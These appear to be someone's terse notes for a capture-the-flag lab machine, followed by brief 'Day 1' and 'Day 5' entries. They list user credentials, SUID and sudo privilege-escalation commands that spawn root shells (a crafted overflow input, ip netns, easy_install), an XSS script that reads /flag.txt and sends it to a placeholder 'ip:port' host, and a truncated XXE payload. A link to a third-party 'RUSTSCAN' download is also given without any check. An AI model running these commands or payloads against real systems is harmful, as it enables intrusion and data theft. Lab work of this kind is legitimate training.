Skip to content

http://10.10.217.224/api/#1bitch

you need rustscan for this machine, download here: https://github.com/Macchimne/RUSTSCAN

Users:

hermoine

neville:eos34dqa7qgwq8@006oudrri1, 6l8084#ufcz2r5mh45nis!3yc

draco:slytherin

Paths to root

/etc/room_of_requirement is a suid binary that will grant a root shell with: { echo -e "012345678901234567890123\xbe\xba\xfe\xca"; cat; } | /etc/room_of_requirement

(/bin/ip) has the suid bit set. this can get root via:

ip netns add foo ip netns exec foo /bin/sh -p

hermoine can run date as sudo, though this just allows file read as far as i can tell with date -f file

draco can run easy_install as root, which can privesc via:

TF=\((mktemp -d) echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <\)(tty) >\((tty) 2>\)(tty)')" > $TF/setup.py sudo easy_install $TF

<script>  
fetch("/flag.txt", {method:'GET',mode:'no-cors',credentials:'same-origin'})  
.then(response => response.text())  
.then(text => {  
fetch('http://ip:port/' + btoa(text), {mode:'no-cors'});  
});  
</script>

Day 1

  • an "MS Windows shortcut", also known as a .lnk file. This file type is used in Windows to link to another file, folder, or application. These shortcuts can also be used to run commands!
  • Operational Security (OPSEC) is a term originally coined in the military to refer to the process of protecting sensitive information and operations from adversaries. The goal is to identify and eliminate potential vulnerabilities before the attacker can learn their identity.

Day 5

  • XXE Payload: ```xml

]> 1 &payload; ```